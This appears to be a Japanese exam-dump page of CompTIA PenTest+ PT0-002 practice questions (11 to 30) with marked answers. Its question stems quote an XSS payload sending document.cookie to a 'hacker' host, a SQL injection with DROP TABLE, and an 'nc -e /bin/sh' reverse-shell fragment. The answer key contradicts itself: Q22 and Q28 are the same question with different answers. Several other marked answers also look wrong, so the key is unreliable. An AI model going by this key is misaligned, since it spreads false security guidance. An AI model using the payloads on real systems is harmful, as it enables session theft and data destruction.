2022年01月16日更新されたPT0-002トレーニング最新認定問題をゲットCompTIA PenTest+合格目指せ [Q11-Q30]

Share

2022年01月16日更新されたPT0-002トレーニング最新認定問題をゲットCompTIA PenTest+合格目指せ

認定トレーニングPT0-002試験問題集でテストエンジン

質問 11
A red-team tester has been contracted to emulate the threat posed by a malicious insider on a company's network, with the constrained objective of gaining access to sensitive personnel files. During the assessment, the red-team tester identifies an artifact indicating possible prior compromise within the target environment.
Which of the following actions should the tester take?

  • A. Perform forensic analysis to isolate the means of compromise and determine attribution.
  • B. Create a detailed document of findings before continuing with the assessment.
  • C. Incorporate the newly identified method of compromise into the red team's approach.
  • D. Halt the assessment and follow the reporting procedures as outlined in the contract.

正解: B

 

質問 12
You are a penetration tester reviewing a client's website through a web browser.
INSTRUCTIONS
Review all components of the website through the browser to determine if vulnerabilities are present.
Remediate ONLY the highest vulnerability from either the certificate, source, or cookies.
If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.






正解:

解説:

Explanation
Graphical user interface Description automatically generated

 

質問 13
A consulting company is completing the ROE during scoping.
Which of the following should be included in the ROE?

  • A. Testing restrictions
  • B. Liability
  • C. Cost ofthe assessment
  • D. Report distribution

正解: D

 

質問 14
A penetration tester ran a ping -A command during an unknown environment test, and it returned a 128 TTL packet. Which of the following OSs would MOST likely return a packet of this type?

  • A. Apple
  • B. Android
  • C. Windows
  • D. Linux

正解: C

 

質問 15
Which of the following documents describes specific activities, deliverables, and schedules for a penetration tester?

  • A. MSA
  • B. SOW
  • C. MOU
  • D. NDA

正解: B

 

質問 16
A company obtained permission for a vulnerability scan from its cloud service provider and now wants to test the security of its hosted data.
Which of the following should the tester verify FIRST to assess this risk?

  • A. Whether the connection between the cloud and the client is secure
  • B. Whether the cloud applications were developed using a secure SDLC
  • C. Whether the client's employees are trained properly to use the platform
  • D. Whether sensitive client data is publicly accessible

正解: D

 

質問 17
A penetration tester has been contracted to review wireless security. The tester has deployed a malicious wireless AP that mimics the configuration of the target enterprise WiFi. The penetration tester now wants to try to force nearby wireless stations to connect to the malicious AP. Which of the following steps should the tester take NEXT?

  • A. Perform jamming on all 2.4GHz and 5GHz channels.
  • B. Set the malicious AP to broadcast within dynamic frequency selection channels.
  • C. Modify the malicious AP configuration to not use a pre-shared key.
  • D. Send deauthentication frames to the stations.

正解: B

 

質問 18
A penetration tester runs the following command on a system:
find / -user root -perm -4000 -print 2>/dev/null
Which of the following is the tester trying to accomplish?

  • A. Find files that were created during exploitation and move them to /dev/null
  • B. Set the SGID on all files in the / directory
  • C. Find files with the SUID bit set
  • D. Find the /root directory on the system

正解: C

 

質問 19
A penetration tester conducted an assessment on a web server. The logs from this session show the following:
http://www.thecompanydomain.com/servicestatus.php?serviceID=892&serviceID=892 ' ; DROP TABLE SERVICES; -- Which of the following attacks is being attempted?

  • A. Cookie hijacking
  • B. Parameter pollution
  • C. Clickjacking
  • D. Cross-site scripting
  • E. Session hijacking

正解: B

 

質問 20
When preparing for an engagement with an enterprise organization, which of the following is one of the MOST important items to develop fully prior to beginning the penetration testing activities?

  • A. Obtain an asset inventory from the client.
  • B. Clarify the statement of work.
  • C. Interview all stakeholders.
  • D. Identify all third parties involved.

正解: B

 

質問 21
Given the following output:
User-agent:*
Disallow: /author/
Disallow: /xmlrpc.php
Disallow: /wp-admin
Disallow: /page/
During which of the following activities was this output MOST likely obtained?

  • A. Website cloning
  • B. URL enumeration
  • C. Domain enumeration
  • D. Website scraping

正解: D

 

質問 22
Given the following code:
<SCRIPT>var+img=new+Image();img.src="http://hacker/%20+%20document.cookie;</SCRIPT> Which of the following are the BEST methods to prevent against this type of attack? (Choose two.)

  • A. Session tokens
  • B. Parameterized queries
  • C. Input validation
  • D. Web-application firewall
  • E. Output encoding
  • F. Base64 encoding

正解: A,B

 

質問 23
A penetration tester runs the unshadow command on a machine. Which of the following tools will the tester most likely use NEXT?

  • A. John the Ripper
  • B. Cain and Abel
  • C. Hydra
  • D. Mimikatz

正解: A

 

質問 24
A company conducted a simulated phishing attack by sending its employees emails that included a link to a site that mimicked the corporate SSO portal. Eighty percent of the employees who received the email clicked the link and provided their corporate credentials on the fake site. Which of the following recommendations would BEST address this situation?

  • A. Restrict employees from web navigation by defining a list of unapproved sites in the corporate proxy.
  • B. Implement a recurring cybersecurity awareness education program for all users.
  • C. Implement multifactor authentication on all corporate applications.
  • D. Implement an email security gateway to block spam and malware from email communications.

正解: B

 

質問 25
Which of the following describe the GREATEST concerns about using third-party open-source libraries in application code? (Choose two.)

  • A. The libraries may be unsupported
  • B. The libraries may be vulnerable
  • C. The provenance of code is unknown
  • D. The libraries' code bases could be read by anyone
  • E. The licensing of software is ambiguous
  • F. The libraries may break the application

正解: B,D

 

質問 26
A penetration tester has obtained root access to a Linux-based file server and would like to maintain persistence after reboot. Which of the following techniques would BEST support this objective?

  • A. Obtain /etc/shadow and brute force the root password.
  • B. Run the nc -e /bin/sh <...> command.
  • C. Move laterally to create a user account on LDAP
  • D. Create a one-shot systemd service to establish a reverse shell.

正解: D

解説:
Explanation
https://hosakacorp.net/p/systemd-user.html

 

質問 27
Which of the following types of information should be included when writing the remediation section of a penetration test report to be viewed by the systems administrator and technical staff?

  • A. The rules of engagement from the assessment
  • B. The executive summary and information regarding the testing company
  • C. A quick description of the vulnerability and a high-level control to fix it
  • D. Information regarding the business impact if compromised

正解: D

 

質問 28
Given the following code:
<SCRIPT>var+img=new+Image();img.src="http://hacker/%20+%20document.cookie;</SCRIPT> Which of the following are the BEST methods to prevent against this type of attack? (Choose two.)

  • A. Session tokens
  • B. Parameterized queries
  • C. Web-application firewall
  • D. Output encoding
  • E. Base64 encoding
  • F. Input validation

正解: B,F

 

質問 29
Which of the following tools provides Python classes for interacting with network protocols?

  • A. Empire
  • B. Responder
  • C. Impacket
  • D. PowerSploit

正解: C

 

質問 30
......

合格を確定するガイドでPT0-002試験準備しよう:https://www.goshiken.com/CompTIA/PT0-002-mondaishu.html

CompTIA PenTest+ PT0-002無料最新のリアル試験問題と回答:https://drive.google.com/open?id=1DPaJ7JtaMgcHIQq0772pDt7PLCtzojWy